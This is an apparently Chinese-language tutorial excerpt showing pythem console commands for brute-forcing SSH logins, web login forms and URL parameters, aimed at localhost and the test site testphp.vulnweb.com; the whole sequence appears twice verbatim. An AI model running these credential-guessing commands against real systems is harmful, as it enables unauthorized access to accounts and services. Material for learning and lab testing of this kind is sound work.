SSH暴破-暴力破解
pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123
Web页面参数暴力破解
首先获取web页面登录时的参数格式id= value 显示重定向页面,如果定向到一个不同的页面则说明猜解正确。 命令 pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSISs_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root
URL内容爆破
pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.
pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123
Web页面参数暴力破解
首先获取web页面登录时的参数格式id= value 显示重定向页面,如果定向到一个不同的页面则说明猜解正确。 命令 pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSISs_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root
URL内容爆破
pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.